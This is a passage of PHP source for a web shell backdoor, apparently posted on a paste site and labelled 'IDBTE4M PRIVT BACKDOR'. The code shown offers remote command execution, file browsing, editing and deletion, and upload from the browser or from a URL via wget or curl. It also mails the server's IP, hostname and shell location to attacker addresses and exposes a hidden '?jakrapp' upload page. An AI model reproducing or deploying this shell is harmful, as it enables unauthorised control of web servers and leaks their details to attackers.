  3405.     if(isset($_GET['type']) && ($_GET['type']=='image')){ echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>"; } elseif(isset($_GET['type']) && ($_GET['type']=='code')){ echo "<div class=\"viewfile\">"; $file = wordwrap(@file_get_contents($file),"240","\n"); @highlight_string($file); echo "</div>"; } else { echo "<div class=\"viewfile\">"; echo nl2br(htmlentities((@file_get_contents($file)))); echo "</div>"; } } elseif(is_dir($_GET['view'])){ echo showdir($pwd,$prompt); } } elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){ if(isset($_POST['save'])){ $file = $_POST['saveas']; $content = magicboom($_POST['content']); if($filez = @fopen($file,"w")){ $time = date("d-M-Y H:i",time());
  3406.     if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time; else $msg = "failed to save"; @fclose($filez); } else $msg = "permission denied"; } if(!isset($file)) $file = $_GET['edit']; if($filez = @fopen($file,"r")){ $content = ""; while(!feof($filez)){ $content .= htmlentities(str_replace("''","'",fgets($filez))); } @fclose($filez); } ?>
  3407.     <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  3408.     <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content">
  3409.     <?php echo $content; ?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" />
  3410.     <input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;<?php echo $msg; ?></td></tr> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ if(isset($_POST['uploadcomp'])){ if(is_uploaded_file($_FILES['file']['tmp_name'])){ $path = magicboom($_POST['path']); $fname = $_FILES['file']['name']; $tmp_name = $_FILES['file']['tmp_name']; $pindah = $path.$fname; $stat = @move_uploaded_file($tmp_name,$pindah); if ($stat) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $fname"; } else $msg = "failed to upload $fname"; } elseif(isset($_POST['uploadurl'])){ $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']);
  3411.     $path = magicboom($_POST['path']); $namafile = download($pilihan,$wurl); $pindah = $path.$namafile; if(is_file($pindah)) { $msg = "file uploaded to $pindah"; } else $msg = "failed to upload $namafile"; } ?>
  3412.     <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  3413.     <table class="tabnet" style="width:320px;padding:0 1px;">
  3414.     <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr>
  3415.     <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  3416.     <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  3417.     <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td>
  3418.     <td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table>
  3419.     <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  3420.     <?php if(isset($_GET['jak']) && ($_GET['jak'] == '?')){ @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); $tujuanmail = '[email protected]'; $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']; $pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]"; mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]"); }?>
  3421.     <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){ ?> <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  3422.     <tr><td colspan="2"><?php echo $prompt; ?> <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:6%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET['delete']) && ($_GET['delete'] != "")){ $file = $_GET['delete']; @unlink($file); } elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){ @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){ $path = $pwd.$_GET['mkdir']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?>
  3423.     <p><center><div class="info">-=[ IDBTE4M PRIVT BACKDOR Recoded By JakRapp ]=-</div>
  3424.     <?php
  3425. $ip = getenv("REMOTE_ADDR");
  3426. $host= gethostname();
  3427. $ips = gethostbyname($host);
  3428. $server = $_SERVER['SERVER_NAME'];
  3429. $shost = $_SERVER['HTTP_HOST'];
  3430. $pageName = basename($_SERVER['SCRIPT_NAME']);
  3431. $dir = $_SERVER["PHP_SELF"];
  3432. date_default_timezone_set("Asia/Jakarta");
  3433. $date = date("d F Y");
  3434. $time = date("H:i:s");
  3435. $message .= "=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [ Uploader Result ] +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n";
  3436. $message .= "Klien IP : ".$ip."\n";
  3437. $message .= "Server IP : ".$ips."\n";
  3438. $message .= "HostName : ".$host."\n";
  3439. $message .= "Domain : ".$server."\n";
  3440. $message .= "Letak uploader : ".$dir."/".$pageName."?jakrapp\n";
  3441. $message .= "Tanggal : ".$date."\n";
  3442. $message .= "Waktu eksekusi : ".$time."\n";
  3443. $message .= "=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ [  Done  ] +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n";
  3444. $subject = "Uploader $server";
  3445. $headers = "From: [email protected]\r\n";
  3446. mail($sgb2,$subject,$message,$headers);
  3447. mail($send,$subject,$message,$headers);
  3448. ?>
  3449. <?php if (isset($_GET['jakrapp'])) {
  3450.     echo "<body bgcolor=white>
  3451. <font color=black size=3>";
  3452.     echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
  3453. <label for=\"file\"></label>
  3454. <input type=\"file\" name=\"file\" id=\"file\" />
  3455. <br />
  3456. <input type=\"submit\" name=\"submit\" value=\"UPLOAD\">
  3457. </form>";
  3458.     if ($_FILES["file"]["error"] > 0) {
  3459.         echo "Error: " . $_FILES["file"]["error"] . "<br />";
  3460.     } else {
  3461.         echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  3462.         echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  3463.         echo "Stored in: " . $_FILES["file"]["tmp_name"];
  3464.     }
  3465.     if (file_exists("" . $_FILES["file"]["name"])) {
  3466.         echo $_FILES["file"]["name"] . " already exists. ";
  3467.     } else {
  3468.         move_uploaded_file($_FILES["file"]["tmp_name"], "" . $_FILES["file"]["name"]);
  3469.         echo "<br>Stored in: " . "" . $_FILES["file"]["name"];
  3470.         echo "<hr>";
  3471.     }
  3472. }
Add Comment
Please, Sign In to add comment